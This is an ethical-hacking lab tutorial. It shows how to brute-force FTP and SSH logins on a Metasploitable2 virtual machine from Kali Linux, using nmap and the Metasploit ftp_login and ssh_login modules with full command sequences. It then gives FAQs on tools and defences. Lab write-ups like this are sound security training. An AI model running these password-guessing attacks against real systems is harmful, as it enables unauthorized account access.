Brute Force Lab Setup for SSH and FTP using Metasploit

🧪 LAB OVERVIEW

This lab demonstrates how to perform brute force attacks on FTP and SSH services using Metasploit Framework (msfconsole). The target machine is Metasploitable2, and the attacker machine is Kali Linux.

🖥️ Machines Used

Role Operating System Tools Used Attacker Kali Linux Metasploit (msfconsole) Target Metasploitable 2FTP (vsftpd), SSH (OpenSSH)

🌐 1. Network Setup

✅ Environment: VirtualBox or VMware

• Set both machines to Host-Only Adapter or NAT Network.
• Ensure both machines are on the same subnet.
• Confirm connectivity using ping.

🖥️ On Kali Linux:

ping 192.168.142.130

🖥️ On Metasploitable2:

ping 192.168.142.128

🔍 2. Scan the Target Machine (Metasploitable2)

Use Nmap to discover open services 

nmap -sS -sV 192.168.142.130

You should see:

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian

🚪 3. Brute Force FTP (Port 21)

🛠️ Step-by-Step:

📁 Prepare user and password files:

nano /home/kali/custom_users.txt

# Example content:

msfadmin

nano /home/kali/custom_pass.txt

🚀 Launch Metasploit:

msfconsole

use auxiliary/scanner/ftp/ftp_login

set RHOSTS 192.168.142.130

set USER_FILE /home/kali/custom_users.txt

set PASS_FILE /home/kali/custom_pass.txt

set THREADS 10

run

output: msfadmin:msfadmin

🔐 4. Brute Force SSH (Port 22)

🛠️ Step-by-Step:

🚀 Launch Metasploit:

msfconsole

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.142.130

set USER_FILE /home/kali/custom_users.txt

set PASS_FILE /home/kali/custom_pass.txt

set THREADS 10

set VERBOSE true

set STOP_ON_SUCCESS true

run

🧾 Conclusion

In this lab, we successfully simulated brute force attacks on FTP and SSH services of a vulnerable target (Metasploitable2) using Metasploit Framework. The results revealed weak credentials (msfadmin:msfadmin) that allowed unauthorized access.

FAQs

1. What is a brute force attack in cybersecurity?

A brute force attack is a method where an attacker repeatedly tries different username and password combinations until the correct credentials are found. This technique is commonly used against services like SSH and FTP. 

2. Which tools are commonly used for SSH and FTP brute force attacks in labs?

Popular tools used in ethical hacking labs include Hydra, Medusa, and Ncrack. These tools automate password-guessing attacks against network services such as SSH and FTP.

3. Why is Kali Linux often used as the attacker machine in brute force labs?

Kali Linux is widely used because it includes preinstalled penetration-testing tools like Hydra, Nmap, and Metasploit, making it ideal for performing and analyzing brute force attacks in controlled environments. 

4. What is Hydra and how does it work in brute force testing?

Hydra is a powerful password-cracking tool that performs automated login attempts against services such as SSH, FTP, Telnet, and HTTP by using username and password wordlists. 

5. Why should brute force attacks only be performed in a lab environment?

Brute force attacks should only be conducted in authorized lab environments because performing them on real systems without permission is illegal and unethical.

6. How can organizations prevent SSH and FTP brute force attacks?

Organizations can reduce the risk by implementing strong passwords, disabling password authentication for SSH, enabling multi-factor authentication, and using intrusion detection systems to monitor login attempts.